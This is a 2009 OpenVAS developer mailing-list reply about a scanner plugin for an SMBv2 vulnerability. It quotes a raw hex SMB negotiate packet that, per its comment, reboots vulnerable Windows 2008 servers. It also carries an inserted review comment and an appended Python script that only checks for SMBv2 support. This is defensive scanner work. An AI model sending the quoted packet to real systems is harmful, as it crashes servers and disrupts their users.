[Openvas-devel] [Openvas-commits] r5349 - in trunk/openvas-plugins: . scripts

Tim Brown timb at openvas.org
Mon Oct 5 22:46:50 CEST 2009


On Monday 05 October 2009 20:59:07 you wrote:
> >    trunk/openvas-plugins/scripts/ms_smb2_highid.nasl
> >
> > + script_category(ACT_GATHER_INFO);
> >
> > +data =
> > raw_string(0x00,0x00,0x00,0x90,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x
> >00,0x18,0x53,0xc8, +                 
> > 0x00,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf
> >f,0xfe, +                 
> > 0x00,0x00,0x00,0x00,0x00,0x6d,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x5
> >7,0x4f, +                 
> > 0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x0
> >0,0x02, +                 
> > 0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00,0x02,0x57,0x69,0x6e,0x6
> >4,0x6f, +                 
> > 0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,0x72,0x6b,0x67,0x72,0x6f,0x7
> >5,0x70, +                 
> > 0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x3
> >0,0x30, +                 
> > 0x32,0x00,0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,0x00,0x02,0x4
> >e,0x54, +                 
> > 0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0x02,0x53,0x4d,0x42,0x20,0x3
> >2,0x2e, +                  0x30,0x30,0x32,0x00); # Tested against 2008
> > Server. A vulnerable Server doing a reboot. I'm not happy with that, but
> > a the moment i have no idea how to detect this vulnerability without
> > exploiting it. +
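Review bot: script_category(ACT_GATHER_INFO) at the top of this hunk contradicts the comment at its end, which says a vulnerable server reboots when it receives this packet. ACT_GATHER_INFO plugins still run when a scan is set to safe checks, so this should use a destructive category (ACT_DENIAL or ACT_KILL_HOST) and skip the send when safe_checks() is true. The raw_string() blob also has no comment saying what it is; a line above it noting that it is an SMB negotiate request whose dialect list ends in "SMB 2.002" would make it reviewable.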
>
> I suspect this script should be classified as ACT_DENIAL
> rather than ACT_GATHER_INFO, given that it causes the
> vulnerable server to reboot.

The /safe/ version of the check would be just to check for SMBv2 support and 
flag it as a possible issue.  It's not perfect but AFAIK it is all that can 
be done at the moment.  You might also be able to fix up the packet so that 
it uses values that are unlikely to trigger the crash but I haven't 
investigated that in any detail.

Tim
-- 
Tim Brown
<mailto:timb at openvas.org>
<http://www.openvas.org/>
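The safe check described in the reply above, sketched as an added Python example (not part of the thread and not OpenVAS code): it sends a well-formed negotiate request that offers the "SMB 2.002" dialect and reports SMBv2 support as a possible issue based on the protocol id of the reply. The function names and the sample replies are constructed for illustration.

```python
import socket
import struct
import sys

# Dialects offered; "SMB 2.002" is the entry that asks the server for SMBv2.
DIALECTS = (b"NT LM 0.12", b"SMB 2.002")
# Constructed sample replies (framing plus protocol id only), for offline use.
SAMPLE_SMB2_REPLY = b"\x00\x00\x00\x40\xfeSMB" + b"\x00" * 60
SAMPLE_SMB1_REPLY = b"\x00\x00\x00\x20\xffSMB" + b"\x00" * 28

def build_negotiate(dialects=DIALECTS):
    """Build a well-formed SMB1 NEGOTIATE request (command 0x72)."""
    header = struct.pack(
        "<4sBIBHH8sHHHHH",
        b"\xffSMB", 0x72, 0,     # protocol id, command, status
        0x18, 0xC853,            # flags, flags2 (values from the quoted packet)
        0, b"\x00" * 8, 0,       # PID high, security features, reserved: all zero
        0xFFFF, 0xFEFF, 0, 0,    # TID, PID low, UID, MID
    )
    body = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    smb = header + b"\x00" + struct.pack("<H", len(body)) + body  # word count 0
    return struct.pack(">I", len(smb)) + smb  # 0x00 type byte + 24-bit length

def classify_reply(frame):
    """Return 'smb2', 'smb1' or 'unknown' from the reply's protocol id."""
    if len(frame) < 8 or frame[0] != 0:
        return "unknown"  # short read or not a session message
    magic = frame[4:8]
    if magic == b"\xfeSMB":
        return "smb2"     # server accepted the SMB 2.002 dialect
    if magic == b"\xffSMB":
        return "smb1"     # server answered in SMB1 only
    return "unknown"

def check_host(host, port=445, timeout=5.0):
    """Send one negotiate request and classify the first bytes of the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_negotiate())
        return classify_reply(sock.recv(4096))

if __name__ == "__main__":
    # With a host argument this touches the network; without one it runs offline.
    result = check_host(sys.argv[1]) if len(sys.argv) > 1 else classify_reply(SAMPLE_SMB2_REPLY)
    print(result, "(SMBv2 enabled: flag as possible issue)" if result == "smb2" else "")
```

A result of "smb2" only shows that the protocol is enabled, so the finding still needs the host's patch level confirmed by other means.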

